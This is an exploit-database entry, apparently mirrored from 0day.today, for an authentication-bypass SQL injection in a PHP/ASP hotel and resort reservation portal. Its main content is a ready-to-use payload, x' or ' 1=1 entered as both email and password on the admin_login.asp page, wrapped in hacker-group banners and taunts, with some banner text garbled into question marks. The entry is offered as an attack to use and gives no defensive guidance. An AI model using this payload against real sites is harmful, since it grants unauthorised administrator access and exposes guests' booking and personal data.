Hotel and Resort Reservation Portal (Auth Bypass) SQL Injection

2010-05-22T00:00:00
ID 1337DAY-ID-12336
Type zdt
Reporter R3d-D3v!L
Modified 2010-05-22T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =============================================================================
Hotel and Resort Reservation Portal (Auth Bypass) SQL Injection Vulnerability 
=============================================================================


[?] ?????????????????????????{In The Name Of Allah The Mercifull}??????????????????????
[?]
[~] Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
[~] Vendor: www.preproject.com
[*] Software:PRE HOTELS & RESORTS MANAGEMENT SYSTEM
[*] author: ((R3d-D3v!L))
[*] Date: 17.dec.2009
[*] T!ME: 3:03 am
[?] Home: WwW.xP10.ME
[?] contact: N/A
[?]
[?]??????????????????????{DEV!L'5 of SYST3M}??????????????????
 
 
 
[*] Exploit:
 
[?] E-/\/\A!L : x' or ' 1=1
 
[?] password : x' or ' 1=1
 
http://server/[path]/admin_login.asp
 
N073:
 
REAL RED DEV!L [email protected] h3r3 LAMERZ
 
GAZA !N our hearts !



#  0day.today [2018-01-01]  #